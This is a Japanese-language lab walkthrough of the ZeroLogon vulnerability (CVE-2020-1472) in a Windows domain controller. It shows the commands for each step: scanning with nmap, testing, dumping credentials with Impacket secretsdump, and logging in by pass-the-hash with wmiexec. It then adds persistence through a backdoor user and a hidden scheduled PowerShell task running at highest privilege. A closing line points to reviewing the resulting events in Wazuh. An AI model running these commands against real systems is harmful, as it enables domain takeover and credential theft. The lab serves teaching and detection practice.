
ZeroLogon脆弱性(CVE-2020-1472)の説明とデモンストレーション
ZeroLogon(CVE-2020-1472)脆弱性の説明とデモンストレーション
このラボの目的は厳密に教育目的です。本番環境または自分が所有していない環境での実行は推奨されません。
脆弱性の背景
この脆弱性により、サイバー犯罪者がドメインコントローラ(DC)を乗っ取ることが可能になります。これは、コントローラ上のサービスアカウントのパスワードを変更または削除することで行われます。悪意のある攻撃者は、単にサービス拒否を引き起こすか、ネットワーク全体を乗っ取り制御することができます。2020年8月、Microsoftはパッチをリリースしました。
影響を受けるコンポーネント: Microsoft Netlogon Remote Protocol (MS-NRPC)
影響を受けるWindowsバージョン:
リポジトリをクローンする
ローカルで実行する場合!
AWSでもこれらのイメージで可能です(課金に注意)
おまけ: SIEMイベント分析のためのWazuhアカウント。
ヒント: Kali Linuxでは、SSHサービスはデフォルトで無効になっています — 手動で起動する必要があります。
サーバーが脆弱かどうかをテストする前に、nmapを使用してどのポートが開いているかを確認できます:
nmap -sS -T4 -F --open -n ip
CVE-2020-1472 - ターゲットサーバーが脆弱かどうかのテスト を使用します。次のコマンドを実行します:
zerologon_tester.py <dc-name> <dc-ip>
secretdump ツールは Impacket のツールキットです。
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
すべてうまくいけば、ハッシュを使ってログインできます What is a pass-the-hash attack?
あとは永続化を作成するだけです!新しいユーザーでも構いません!
net user coringa Batman2025 /add
完了!ユーザーが正常に作成されました!
タスクを作成することも可能です!
mkdir C:\Temp
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
ユーザーの作成と、pass-the-hash およびユーザー作成に関連するイベントを確認できます!